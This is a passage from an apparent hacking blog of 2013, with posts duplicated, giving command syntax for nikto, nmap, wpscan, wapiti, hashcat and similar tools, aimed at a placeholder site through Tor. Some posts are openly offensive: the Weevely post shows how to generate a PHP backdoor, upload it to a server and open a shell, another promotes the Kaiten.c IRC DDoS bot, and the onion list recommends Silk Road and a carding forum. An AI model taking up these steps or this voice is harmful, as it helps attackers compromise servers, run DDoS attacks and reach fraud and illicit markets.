3 : Enumerate user names via Apache (/~user type requests)
4 : Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 : Attempt to brute force sub-domain names, assume that the host name is the parent domain
6 : Attempt to guess directory names from the supplied dictionary file
-nointeractive : Disables interactive features
-nolookup : Disables DNS lookups
-nossl : Disables the use of SSL
-no404 : Disables nikto attempting to guess a 404 page
-output path : Write output to this file ('.' for auto-name)
-port : Port to use (default 80)
-ssl : Force ssl mode on port
-Tuning : Scan tuning :
1 : Interesting File / Seen in logs
2 : Misconfiguration / Default File
3 : Information Disclosure
4 : Injection (XSS/Script/HTML)
5 : Remote File Retrieval - Inside Web Root
6 : DoS 7 : Remote File Retrieval - Server Wide
8 : Command Execution / Remote Shell
9 : SQL Injection
0 : File upload
a : Authentication Bypass
b : Software Identification
c : Remote Source Inclusion
x : Reverse Tuning Options (i.e., include all except specified)
-timeout : Timeout for requests (default 10s)
-useproxy : Use the proxy defined in nikto.conf
Example :
nikto -host www.site.com -maxtime 600 -port 80 -nossl -output /home/HackForLulz/result
Target : site.com
Max time scan : 600
Port : 80
ssl : No
Output : /home/HackForLulz/result
nikto -host www.site.com -maxtime 1200 -port 80 -ssl -Tuning 9 -output /home/HackForLulz/result
Target : www.site.com
Max time scan : 1200
Port : 80
ssl : Yes
Scan tuning : SQL Injection (9)
Output : /home/HackForLulz/result
nikto -host www.site.com -port 443 -ssl -Tuning 129 -output /home/HackForLulz/result
Target : www.site.com
port : 443
ssl : Yes
Tuning : 1 (Interesting File) 2(Misconfiguration / Default File) 9(SQL Injection)
Output : /home/HackForLulz/result
For more information about nikto type : nikto -H
If you have a problem or you need some explanations just write under this post!
Sunday, February 24, 2013
Nmap - Network scanner
Nmap is a free and open source utility for network discovery and security auditing.
You can find nmap here
For install guide click here
Syntax : nmap scan type options target
For target you can pass hostname , IP address ecc..
-iL filename : Input from list of hosts/networks
-sL: List Scan
-sn: Ping Scan (disable ping scan)
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sO: IP protocol scan
-sY/sZ: SCTP INIT/COOKIE-ECHO scans
-p range port scan : Only scan specified ports
-F: Fast mode
-r: Scan ports consecutively - don't randomize
-O: Enable OS detection
-A: Enable OS detection, version detection, script scanning, and traceroute
-6: Enable IPv6 scanning
-v: Increase verbosity level (use -vv or more for greater effect)
-oN/-oX/-oS/-oG: Output scan in normal, XML, script kiddie,
and Grepable format, respectively, to the given filename.
Nmap have a lot others options, you can see that with command : nmap -h
Nmap has also a GUI called zenmap. You can find zenmap here (DON'T RECCOMENDED)
Example :
nmap -O -r -F -sS -vv www.site.com
Os detection : Yes
Version detection, script scanning and traceroute : No
Scan port consecutively : Yes
Fast scan mode : Yes
TCP scan : Yes
UDP scan : No
Target : site.com
nmap -A -F -sU -p 20-25 www.site.com
Os detection : Yes
Version detection, script scanning and traceroute : Yes
Fast scan mode : Yes
TCP scan : Yes
UDP scan : No
Port TCP: 20,21,22,23,24,25
Target : site.com
nmap -A -sU -sS -p T:21,80,139 U:53,111 www.site.com
Os detection : Yes
Version detection, script scanning and traceroute : Yes
Fast scan mode : No
TCP scan : Yes
UDP scan : Yes
Port TCP: 21,80,139 (specified by T:port)
Port UDP: 53,111 (specified by U:port)
If you have a problem or you need some explanations just write under this post!
You can find nmap here
For install guide click here
Syntax : nmap scan type options target
For target you can pass hostname , IP address ecc..
-iL filename : Input from list of hosts/networks
-sL: List Scan
-sn: Ping Scan (disable ping scan)
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sO: IP protocol scan
-sY/sZ: SCTP INIT/COOKIE-ECHO scans
-p range port scan : Only scan specified ports
-F: Fast mode
-r: Scan ports consecutively - don't randomize
-O: Enable OS detection
-A: Enable OS detection, version detection, script scanning, and traceroute
-6: Enable IPv6 scanning
-v: Increase verbosity level (use -vv or more for greater effect)
-oN/-oX/-oS/-oG
Nmap have a lot others options, you can see that with command : nmap -h
Nmap has also a GUI called zenmap. You can find zenmap here (DON'T RECCOMENDED)
Example :
nmap -O -r -F -sS -vv www.site.com
Os detection : Yes
Version detection, script scanning and traceroute : No
Scan port consecutively : Yes
Fast scan mode : Yes
TCP scan : Yes
UDP scan : No
Target : site.com
nmap -A -F -sU -p 20-25 www.site.com
Os detection : Yes
Version detection, script scanning and traceroute : Yes
Fast scan mode : Yes
TCP scan : Yes
UDP scan : No
Port TCP: 20,21,22,23,24,25
Target : site.com
nmap -A -sU -sS -p T:21,80,139 U:53,111 www.site.com
Os detection : Yes
Version detection, script scanning and traceroute : Yes
Fast scan mode : No
TCP scan : Yes
UDP scan : Yes
Port TCP: 21,80,139 (specified by T:port)
Port UDP: 53,111 (specified by U:port)
If you have a problem or you need some explanations just write under this post!
Friday, February 22, 2013
Wireshark-cli
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education.
You can find wireshark here
Wireshark have a GUI but in this article we use the CLI of wireshark
If you use archlinux you can install wireshark-cli from official repo.
For other informations about wireshark on archlinux click here.
We use alias wireshark to run wireshark-cli.
Syntax : wireshark options ..
options:
-i interface : name of network interface
-f capture filter : packet filter in libpcap filter syntax
-s snaplen : packet snapshot length (default: 65535)
-I : capture in monitor mode
-p : don't capture in promiscuous mode
-c packet count : stop after n packets (default: infinite)
-a autostop condition : duration:NUM - stop after NUM seconds
filesize:NUM - stop this file after NUM KB
files:NUM - stop after NUM files
-w filename : name of file to save (default: tempfile)
-t : use a separate thread per interface
-q : don't report packet capture counts
For more informations about the options type :
wireshark -h
example : wireshark -i wlan0 -c 500 -w
Capture network packets from interface wlan0 until 500 packet, passed into tempfile
example : wireshark -i wlan0 -a duration:60 -w file
Capture network packets from interface wlan0 until 60s, passed into file
If you have a problem or you need some explanations just write under this post!
You can find wireshark here
Wireshark have a GUI but in this article we use the CLI of wireshark
If you use archlinux you can install wireshark-cli from official repo.
For other informations about wireshark on archlinux click here.
We use alias wireshark to run wireshark-cli.
Syntax : wireshark options ..
options:
-i interface : name of network interface
-f capture filter : packet filter in libpcap filter syntax
-s snaplen : packet snapshot length (default: 65535)
-I : capture in monitor mode
-p : don't capture in promiscuous mode
-c packet count : stop after n packets (default: infinite)
-a autostop condition : duration:NUM - stop after NUM seconds
filesize:NUM - stop this file after NUM KB
files:NUM - stop after NUM files
-w filename : name of file to save (default: tempfile)
-t : use a separate thread per interface
-q : don't report packet capture counts
For more informations about the options type :
wireshark -h
example : wireshark -i wlan0 -c 500 -w
Capture network packets from interface wlan0 until 500 packet, passed into tempfile
example : wireshark -i wlan0 -a duration:60 -w file
Capture network packets from interface wlan0 until 60s, passed into file
If you have a problem or you need some explanations just write under this post!
Wednesday, February 20, 2013
GPG - Gnu Privacy Guard
GNU Privacy Guard (GnuPG or GPG) is a GPL Licensed alternative to the PGP suite of cryptographic software. GnuPG is compliant with RFC 4880, which is the current IETF standards track specification of OpenPGP.
You can find GPG here
GENERATE NEW KEY:
gpg --gen-key
Now you have to choose between :
(1) RSA and RSA (default)
(2) DSA and Elgamal
(3) DSA (sign only)
(4) RSA (sign only)
After you have to choose the lenght of the key. More long more security vs. bruteforce attack.
Now you have to choose the expiration date.
Now insert real name, email, comment and the passphrase.
To generate revocation certificate type:
gpg --output filename.asc --gen-revoke email
To show the list of keys type:
gpg --list-keys
To export the public key type:
gpg --output filename.gpg --export email
Now send the public key to the others.
To import the public key type:
gpg --import filename.gpg
To encrypt a document type:
gpg --output doc.gpg --encrypt --recipient email doc
To decrypt a document type:
gpg --output doc --decrypt doc.gpg
If you have the public key you can encrypt a doc and send to some that have the private key to decrypt the document.
To sign a document type:
gpg --output doc.sig --sign doc
We use the sign to ensure the that no one has changed the document!
To verify the sign use the --verify option.
To verify the sign and decrypt the document use --decrypt
If you have a problem or you need some explanations just write under this post!
You can find GPG here
GENERATE NEW KEY:
gpg --gen-key
Now you have to choose between :
(1) RSA and RSA (default)
(2) DSA and Elgamal
(3) DSA (sign only)
(4) RSA (sign only)
After you have to choose the lenght of the key. More long more security vs. bruteforce attack.
Now you have to choose the expiration date.
Now insert real name, email, comment and the passphrase.
To generate revocation certificate type:
gpg --output filename.asc --gen-revoke email
To show the list of keys type:
gpg --list-keys
To export the public key type:
gpg --output filename.gpg --export email
Now send the public key to the others.
To import the public key type:
gpg --import filename.gpg
To encrypt a document type:
gpg --output doc.gpg --encrypt --recipient email doc
To decrypt a document type:
gpg --output doc --decrypt doc.gpg
If you have the public key you can encrypt a doc and send to some that have the private key to decrypt the document.
To sign a document type:
gpg --output doc.sig --sign doc
We use the sign to ensure the that no one has changed the document!
To verify the sign use the --verify option.
To verify the sign and decrypt the document use --decrypt
If you have a problem or you need some explanations just write under this post!
Monday, February 18, 2013
Onion website
Here you can find some onion website very interesting:
Tordir : http://dppmfxaacucguzpc.onion list of onion website (RECCOMENDED)
Hashparty : http://3terbsb5mmmdyhse.onion/
Silkroad : silkroadvb5piz3r.onion is an online anonymous market place (RECCOMENDED)
Area51 : http://u3dqz36dcvhwd7kv.onion/ Tor Carding Forum : http://wkwjr7pn7xubtpx5.onion/
HackBB : clsvtzwzdgzkjda7.onion Hacking Forum
Anarchism Library : http://4zeottxi5qmnnjhd.onion/ (RECCOMENDED)
Black Market Reload : 5onwnspjvuk7cwvk.onion.to
Tordir : http://dppmfxaacucguzpc.onion list of onion website (RECCOMENDED)
Hashparty : http://3terbsb5mmmdyhse.onion/
Silkroad : silkroadvb5piz3r.onion is an online anonymous market place (RECCOMENDED)
Area51 : http://u3dqz36dcvhwd7kv.onion/ Tor Carding Forum : http://wkwjr7pn7xubtpx5.onion/
HackBB : clsvtzwzdgzkjda7.onion Hacking Forum
Anarchism Library : http://4zeottxi5qmnnjhd.onion/ (RECCOMENDED)
Black Market Reload : 5onwnspjvuk7cwvk.onion.to
Sunday, February 17, 2013
Shred
Shred is a Unix command that can be used to securely delete files and devices so that they can be recovered only with great difficulty with specialised hardware, if at all.
Syntax : shred options file
Options :
-f : change permissions to allow writing if necessary
-n : overwrite N times instead of the default (3)
-s : shred this many bytes (suffixes like K, M, G accepted)
-u : truncate and remove file after overwriting
-v : show progress
-x : do not round file sizes up to the next full block
-z : add a final overwrite with zeros to hide shredding
For more informations type : shred --help
If you have a problem or you need some explanations just write under this post!
Syntax : shred options file
Options :
-f : change permissions to allow writing if necessary
-n : overwrite N times instead of the default (3)
-s : shred this many bytes (suffixes like K, M, G accepted)
-u : truncate and remove file after overwriting
-v : show progress
-x : do not round file sizes up to the next full block
-z : add a final overwrite with zeros to hide shredding
For more informations type : shred --help
If you have a problem or you need some explanations just write under this post!
Thursday, February 14, 2013
Kaiten.c - DDoS client
Kaitan.c is an IRC based DDoS client.
It connects to the server specified below and accepts commands via the channel specified.
Syntax : !nick command
For see all commands type : !nick help
You send this message to the channel that is defined later in this code.
You can download kaiten.c from here
If you have a problem or you need some explanations just write under this post!
It connects to the server specified below and accepts commands via the channel specified.
Syntax : !nick command
For see all commands type : !nick help
You send this message to the channel that is defined later in this code.
You can download kaiten.c from here
If you have a problem or you need some explanations just write under this post!
Wednesday, February 13, 2013
Cpulimit
Cpulimit is a simple program that attempts to limit the cpu usage of a process.
Cpulimit is pre-installed on a lot of distro but if you don't have you can downlaod from here
Syntax : cpulimit OPTIONS... TARGET
Options :
-l : percentage of cpu allowed from 0 to 200 (required)
-z : exit if there is no target process, or if it dies
-i : don't limit children processes
Target :
-e : name of the executable program file or path name
-p : pid of the process (implies -z)
Example:
cpulimit -l 50 -e firefox
Percentage : 50
Program : Firefox
Limit children process : Yes
cpulimit -l 120 -e firefox -i
Percentage: 120
Program : Firefox
Limit children process : No
cpulimit -l 70 -p 1000 -z
Percentage : 70
Pid : 1000
If you have a problem or you need some explanations just write under this post!
Cpulimit is pre-installed on a lot of distro but if you don't have you can downlaod from here
Syntax : cpulimit OPTIONS... TARGET
Options :
-l : percentage of cpu allowed from 0 to 200 (required)
-z : exit if there is no target process, or if it dies
-i : don't limit children processes
Target :
-e : name of the executable program file or path name
-p : pid of the process (implies -z)
Example:
cpulimit -l 50 -e firefox
Percentage : 50
Program : Firefox
Limit children process : Yes
cpulimit -l 120 -e firefox -i
Percentage: 120
Program : Firefox
Limit children process : No
cpulimit -l 70 -p 1000 -z
Percentage : 70
Pid : 1000
If you have a problem or you need some explanations just write under this post!
Monday, February 11, 2013
Weevely - Php web shell
Weevely is a stealth PHP web shell that provides a telnet-like console.
It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.
You can download weevely from here
For run weevely on linux we need python 2.x and :
-Module :file.mount install httpfs
-Module :audit.mapwebfiles install beautifulsoup
For other operating system click here
For generate php backdoor type :
./weevely.py generate password path
Now we upload our php backdoor on server and after we can start ssh-like terminal session :
./weevely.py url password
For more informations about available module and backdoor generators type :
./weevely.py help
To run Weevely through an HTTP proxy set the shell.php proxy parameter in the default rc file:
For example for use weevely with tor:
cat ~/.weevely/weevely.rc
:set shell.php proxy=127.0.0.1:8118
For more informations read tutorial here
If you have a problem or you need some explanations just write under this post!
It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.
You can download weevely from here
For run weevely on linux we need python 2.x and :
-Module :file.mount install httpfs
-Module :audit.mapwebfiles install beautifulsoup
For other operating system click here
For generate php backdoor type :
./weevely.py generate password path
Now we upload our php backdoor on server and after we can start ssh-like terminal session :
./weevely.py url password
For more informations about available module and backdoor generators type :
./weevely.py help
To run Weevely through an HTTP proxy set the shell.php proxy parameter in the default rc file:
For example for use weevely with tor:
cat ~/.weevely/weevely.rc
:set shell.php proxy=127.0.0.1:8118
For more informations read tutorial here
If you have a problem or you need some explanations just write under this post!
Thursday, February 7, 2013
Tormail
Tor Mail is a Tor Hidden Service that allows anyone to send and receive email anonymously.
This product is produced independently from the Tor® anonymity software and carries no guarantee from The Tor Project about quality, suitability or anything else.
For more information, or to signup for your free @tormail.org account, which includes webmail, smtp, pop3, imap access.
For use tormail Tor hidden service at : http://jhiwjjlqpyawmpjx.onion or click here
For visit onion web site you must use tor, for more informations click here
If you have a problem or you need some explanations just write under this post!
This product is produced independently from the Tor® anonymity software and carries no guarantee from The Tor Project about quality, suitability or anything else.
For more information, or to signup for your free @tormail.org account, which includes webmail, smtp, pop3, imap access.
For use tormail Tor hidden service at : http://jhiwjjlqpyawmpjx.onion or click here
For visit onion web site you must use tor, for more informations click here
If you have a problem or you need some explanations just write under this post!
Wednesday, February 6, 2013
Skipfish - Web app scanner
Skipfish is an active web application security reconnaissance tool.
The tool is believed to support Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments.
You can download skipfish from here
After download extract (tar -zxvf skipfish-2.10b.tgz) and move into directory
Type : make
After for run skipfish type : ./skipfish
Syntax : ./skipfish [ options ... ] -W wordlist -o output_dir start_url [ start_url2 ... ]
For all options type : ./skipfish -h
If you have a problem or you need some explanations just write under this post!
The tool is believed to support Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments.
You can download skipfish from here
After download extract (tar -zxvf skipfish-2.10b.tgz) and move into directory
Type : make
After for run skipfish type : ./skipfish
Syntax : ./skipfish [ options ... ] -W wordlist -o output_dir start_url [ start_url2 ... ]
For all options type : ./skipfish -h
If you have a problem or you need some explanations just write under this post!
Tuesday, February 5, 2013
Knock - Subdomain scan
Knock is a python script, written by Gianni Amato, designed to enumerate subdomains on a target domain through a wordlist.
Knock is targeted to:
-Scan subdomains
-DNS request for zone transfer
-DNS resolver
-Wildcard testing
-Wildcard bypass
For run we need python 2.x
You can download knock from here
For scan type :
./knock.py site.com
For scan with external wordlist type:
./knock.py site.com wordlist
Other options:
-zt : Zone Transfer discovery
-wc : Wildcard testing
-dns : Dns resolving
-bw : Bypass wildcard
If you have a problem or you need some explanations just write under this post!
Knock is targeted to:
-Scan subdomains
-DNS request for zone transfer
-DNS resolver
-Wildcard testing
-Wildcard bypass
For run we need python 2.x
You can download knock from here
For scan type :
./knock.py site.com
For scan with external wordlist type:
./knock.py site.com wordlist
Other options:
-zt : Zone Transfer discovery
-wc : Wildcard testing
-dns : Dns resolving
-bw : Bypass wildcard
If you have a problem or you need some explanations just write under this post!
Friday, February 1, 2013
JoomScan , WpScan - Joomla and Wordpress scan
Wordpress is a free and open source blogging tool and a content management system (CMS) based on PHP and MySQL.
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently.
Wordpress and Joomla are serice very common.
There are a vulnerabilty scans for wordpress (wpscan) and for joomla (joomscan)
You can download joomscan from here
For run Joomscan type :
perl joomscan.pl -u url
Options:
-x proxy:port = Proxy to tunnel
-c string = Cookie (name=value;)
-nv = No Version fingerprinting check
-nf = No Firewall detection check
-ot /path/ = Output to Text file
-vu = Verbose (output every Url scan)
-sp = Show completed Percentage
Example :
perl joomscan.pl -u www.site.com -x 127.0.0.1:9050 -ot /home/HackForLulz/result -sp -vu
Target = site.com
Proxy = localhost:9050 <- through by Tor
Output = /home/HackForLulz/result
Show percentage = yes
For more informations type : perl joomscan.pl
You can download wpscan from here
For run type :
ruby wpscan.rb --url url
Options:
--threads numberofthreads
--worldlist wordlist : Do wordlist password brute force on enumerated users
--enumerate p : enumerate plugins
--enumerate t : enumerate themes
--enumerate u : enumerate users
--enumerate tt : enumerate installed timthumbs
--proxy host:port
Example :
ruby wpscan.rb --url www.site.com --threads 16 --enumerate t --enumerate -u
Target = site.com
Threads = 16
Enumerate themes = Yes
Enumerate users = Yes
ruby wpscan.rb --url www.site.com --threads 32 --enumerate t --enumerate -u --enumerate tt --proxy 127.0.0.1:9050
Target = site.com
Threads = 32
Enumerate themes = Yes
Enumerate users = Yes
Enumerate installe timthumbs = Yes
Proxy = localhost:9050 <- Through by Tor
For more informations type : ruby wpscan.rb --help
If you have a problem or you need some explanations just write under this post!
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently.
Wordpress and Joomla are serice very common.
There are a vulnerabilty scans for wordpress (wpscan) and for joomla (joomscan)
You can download joomscan from here
For run Joomscan type :
perl joomscan.pl -u url
Options:
-x proxy:port = Proxy to tunnel
-c string = Cookie (name=value;)
-nv = No Version fingerprinting check
-nf = No Firewall detection check
-ot /path/ = Output to Text file
-vu = Verbose (output every Url scan)
-sp = Show completed Percentage
Example :
perl joomscan.pl -u www.site.com -x 127.0.0.1:9050 -ot /home/HackForLulz/result -sp -vu
Target = site.com
Proxy = localhost:9050 <- through by Tor
Output = /home/HackForLulz/result
Show percentage = yes
For more informations type : perl joomscan.pl
You can download wpscan from here
For run type :
ruby wpscan.rb --url url
Options:
--threads numberofthreads
--worldlist wordlist : Do wordlist password brute force on enumerated users
--enumerate p : enumerate plugins
--enumerate t : enumerate themes
--enumerate u : enumerate users
--enumerate tt : enumerate installed timthumbs
--proxy host:port
Example :
ruby wpscan.rb --url www.site.com --threads 16 --enumerate t --enumerate -u
Target = site.com
Threads = 16
Enumerate themes = Yes
Enumerate users = Yes
ruby wpscan.rb --url www.site.com --threads 32 --enumerate t --enumerate -u --enumerate tt --proxy 127.0.0.1:9050
Target = site.com
Threads = 32
Enumerate themes = Yes
Enumerate users = Yes
Enumerate installe timthumbs = Yes
Proxy = localhost:9050 <- Through by Tor
For more informations type : ruby wpscan.rb --help
If you have a problem or you need some explanations just write under this post!
Wednesday, January 30, 2013
Wapiti - Server vulnerability scans
Wapiti is a tool written in python that analyze website.
You can download wapiti from here
Work with python > 2.4 and python < 3.0
Wapiti can detect following vulnerabilies:
-File Handling Errors (Local and remote include/require, fopen, readfile...)
-Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
-XSS (Cross Site Scripting) Injection
-LDAP Injection
-Command Execution detection (eval(), system(), passtru()...)
-CRLF Injection (HTTP Response Splitting, session fixation...)
For run wapiti type : ./wapiti.py url
The more important options are:
-s : To specify an url to start with
-x : To exclude an url from the scan
-p : To specify a proxy
-t : To fix the timeout
-v : Set the verbosity level 0: quiet (default), 1: print each url, 2: print every attack
-o : Set the name of the report file
Example :
./wapiti.py http://site.com -o /home/HackForLulz/result
Target = site.com
Output = /home/HackForLulz/result
./wapiti.py http://site.com -p 127.0.0.1:9050 -o /home/HackForLulz/result
Target = site.com
Output = /home/HackForLulz/result
Proxy : localhost:9050 (SOCKS 5) <- through by Tor
./wapiti.py http://site.com -x http://site.com/admin -n 100
Target = site.com
Exclude = http://site.com/admin <- Exclude directory /admin
Max url = 100
If you have a problem or you need some explanations just write under this post!
You can download wapiti from here
Work with python > 2.4 and python < 3.0
Wapiti can detect following vulnerabilies:
-File Handling Errors (Local and remote include/require, fopen, readfile...)
-Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
-XSS (Cross Site Scripting) Injection
-LDAP Injection
-Command Execution detection (eval(), system(), passtru()...)
-CRLF Injection (HTTP Response Splitting, session fixation...)
For run wapiti type : ./wapiti.py url
The more important options are:
-s : To specify an url to start with
-x : To exclude an url from the scan
-p : To specify a proxy
-t : To fix the timeout
-v : Set the verbosity level 0: quiet (default), 1: print each url, 2: print every attack
-o : Set the name of the report file
Example :
./wapiti.py http://site.com -o /home/HackForLulz/result
Target = site.com
Output = /home/HackForLulz/result
./wapiti.py http://site.com -p 127.0.0.1:9050 -o /home/HackForLulz/result
Target = site.com
Output = /home/HackForLulz/result
Proxy : localhost:9050 (SOCKS 5) <- through by Tor
./wapiti.py http://site.com -x http://site.com/admin -n 100
Target = site.com
Exclude = http://site.com/admin <- Exclude directory /admin
Max url = 100
If you have a problem or you need some explanations just write under this post!
Sunday, January 27, 2013
WPS crack
So, what is WPS?
WPS (Wi-fi protected setup) is a computing standard that attempts to allow easy establishment of a secure wireless home network.
Why is vulnerable?
WPS has been shown to easily fall to brute-force attacks (discovered by Stefan Viehbock).
WPS ask you a 8 pin number (the last digit is checksum), so we've 10^8 combinatios, but WPS say you when the first (or the last) 4/3 pin is correct so we've 10^4+10^3 (11000) combinations.
How can we exploit this vulnerability?
There are two script (written by Stefan Viehbock):
-Reaver
-Wspcrack
If you have a problem or you need some explanations just write under this post!
WPS (Wi-fi protected setup) is a computing standard that attempts to allow easy establishment of a secure wireless home network.
Why is vulnerable?
WPS has been shown to easily fall to brute-force attacks (discovered by Stefan Viehbock).
WPS ask you a 8 pin number (the last digit is checksum), so we've 10^8 combinatios, but WPS say you when the first (or the last) 4/3 pin is correct so we've 10^4+10^3 (11000) combinations.
How can we exploit this vulnerability?
There are two script (written by Stefan Viehbock):
-Reaver
-Wspcrack
If you have a problem or you need some explanations just write under this post!
Tuesday, January 22, 2013
Hashcat - Advanced password recovery
Hashcat is an advanced tool for password recovery.
You can download hashcat from here
Hashcat support 6 attack-modes:
-0=Straight
-1=Combination
-2=Toggle-case
-3=Brute-force
-4=Permutation
-5=Table-lookup
Hashcat support a lot of algorithms like MD5, SHA1, MySQL, Phpass, MD4, SHA256, SHA512, OS X, vBullettin.
Hashcat work on all linux distro, windows and mac os x
Syntax : hashcat [options] hashfile [mask|wordfiles|directories]
-m : Hash-type, see references below
-a : Attack-mode
-o : Output file
-n : Number of threads
--pw-min=NUM Password-length minimum
--pw-max=NUM Password-length maximum
--custom-charset1=CS User-defined charsets
Charset :
-?l = abcdefghijklmnopqrstuvwxyz
-?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
-?d = 0123456789
-?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
-?a = ?l?u?d?s
-?h = 8 bit characters from 0xc0 - 0xff
-?D = 8 bit characters from german alphabet
-?F = 8 bit characters from french alphabet
-?R = 8 bit characters from russian alphabet
For more info type : hashcat -h
Hash type :
0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
50 = HMAC-MD5 (key = $pass)
60 = HMAC-MD5 (key = $salt)
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
150 = HMAC-SHA1 (key = $pass)
160 = HMAC-SHA1 (key = $salt)
200 = MySQL
300 = MySQL4.1/MySQL5
400 = phpass, MD5(Wordpress), MD5(phpBB3)
500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
800 = SHA-1(Django)
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials, mscash
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1450 = HMAC-SHA256 (key = $pass)
1460 = HMAC-SHA256 (key = $salt)
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1750 = HMAC-SHA512 (key = $pass)
1760 = HMAC-SHA512 (key = $salt)
1800 = SHA-512(Unix)
2600 = Double MD5
3300 = MD5(Sun)
3500 = md5(md5(md5($pass)))
3610 = md5(md5($salt).$pass)
3710 = md5($salt.md5($pass))
3810 = md5($salt.$pass.$salt)
3910 = md5(md5($pass).md5($salt))
4010 = md5($salt.md5($salt.$pass))
4110 = md5($salt.md5($pass.$salt))
4210 = md5($username.0.$pass)
4300 = md5(strtoupper(md5($pass)))
4400 = md5(sha1($pass))
4500 = sha1(sha1($pass))
4600 = sha1(sha1(sha1($pass)))
4700 = sha1(md5($pass))
4800 = MD5(Chap)
5000 = SHA-3(Keccak)
Example :
hashcat -m 0 -a 3 -n 5 --pw-min=3 --pw-max=5 --custom-charset1=?l hash.txt ?1?1?1?1?1 -o /home/HackForLulz/result
Type = MD5 (0=MD5)
Attack mode = Bruteforce
Threads = 5
Min lenght of password = 3
Max lenght of password = 5
Charset = ?l -> abcdefghijklmnopqrstuvwxyz
Hash = /home/HackForLulz/hash.txt
?1?1?1?1?1 = after ? you specify the "type" of char, for example if the first character is b you can specify ?l (because b is in ?l charset), if you don't know you use 1
Output = /home/HackForLulz/result <- File
hashcat -m 1400 -a 3 -n 5 --pw-min=4 --pw-max=7 --custom-charset1=?l?u?d?s hash.txt ?l?1?1?1?1?1?1 -o /home/HackForLulz/hash
Type = SHA256 (1400=SHA256)
Threads = 5
Min lenght of password = 4
Max lenght of password = 7
Charset = ?l?u?d?s -> abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
Hash = hash.txt <- File
?l?1?1?1?1?1?d -> first character is in ?l (abcde...) and the last character is in ?d (0123...)
If you have any problem or if you need some explanations just write under this post!
You can download hashcat from here
Hashcat support 6 attack-modes:
-0=Straight
-1=Combination
-2=Toggle-case
-3=Brute-force
-4=Permutation
-5=Table-lookup
Hashcat support a lot of algorithms like MD5, SHA1, MySQL, Phpass, MD4, SHA256, SHA512, OS X, vBullettin.
Hashcat work on all linux distro, windows and mac os x
Syntax : hashcat [options] hashfile [mask|wordfiles|directories]
-m : Hash-type, see references below
-a : Attack-mode
-o : Output file
-n : Number of threads
--pw-min=NUM Password-length minimum
--pw-max=NUM Password-length maximum
--custom-charset1=CS User-defined charsets
Charset :
-?l = abcdefghijklmnopqrstuvwxyz
-?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
-?d = 0123456789
-?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
-?a = ?l?u?d?s
-?h = 8 bit characters from 0xc0 - 0xff
-?D = 8 bit characters from german alphabet
-?F = 8 bit characters from french alphabet
-?R = 8 bit characters from russian alphabet
For more info type : hashcat -h
Hash type :
0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
50 = HMAC-MD5 (key = $pass)
60 = HMAC-MD5 (key = $salt)
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
150 = HMAC-SHA1 (key = $pass)
160 = HMAC-SHA1 (key = $salt)
200 = MySQL
300 = MySQL4.1/MySQL5
400 = phpass, MD5(Wordpress), MD5(phpBB3)
500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
800 = SHA-1(Django)
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials, mscash
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1450 = HMAC-SHA256 (key = $pass)
1460 = HMAC-SHA256 (key = $salt)
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1750 = HMAC-SHA512 (key = $pass)
1760 = HMAC-SHA512 (key = $salt)
1800 = SHA-512(Unix)
2600 = Double MD5
3300 = MD5(Sun)
3500 = md5(md5(md5($pass)))
3610 = md5(md5($salt).$pass)
3710 = md5($salt.md5($pass))
3810 = md5($salt.$pass.$salt)
3910 = md5(md5($pass).md5($salt))
4010 = md5($salt.md5($salt.$pass))
4110 = md5($salt.md5($pass.$salt))
4210 = md5($username.0.$pass)
4300 = md5(strtoupper(md5($pass)))
4400 = md5(sha1($pass))
4500 = sha1(sha1($pass))
4600 = sha1(sha1(sha1($pass)))
4700 = sha1(md5($pass))
4800 = MD5(Chap)
5000 = SHA-3(Keccak)
Example :
hashcat -m 0 -a 3 -n 5 --pw-min=3 --pw-max=5 --custom-charset1=?l hash.txt ?1?1?1?1?1 -o /home/HackForLulz/result
Type = MD5 (0=MD5)
Attack mode = Bruteforce
Threads = 5
Min lenght of password = 3
Max lenght of password = 5
Charset = ?l -> abcdefghijklmnopqrstuvwxyz
Hash = /home/HackForLulz/hash.txt
?1?1?1?1?1 = after ? you specify the "type" of char, for example if the first character is b you can specify ?l (because b is in ?l charset), if you don't know you use 1
Output = /home/HackForLulz/result <- File
hashcat -m 1400 -a 3 -n 5 --pw-min=4 --pw-max=7 --custom-charset1=?l?u?d?s hash.txt ?l?1?1?1?1?1?1 -o /home/HackForLulz/hash
Type = SHA256 (1400=SHA256)
Threads = 5
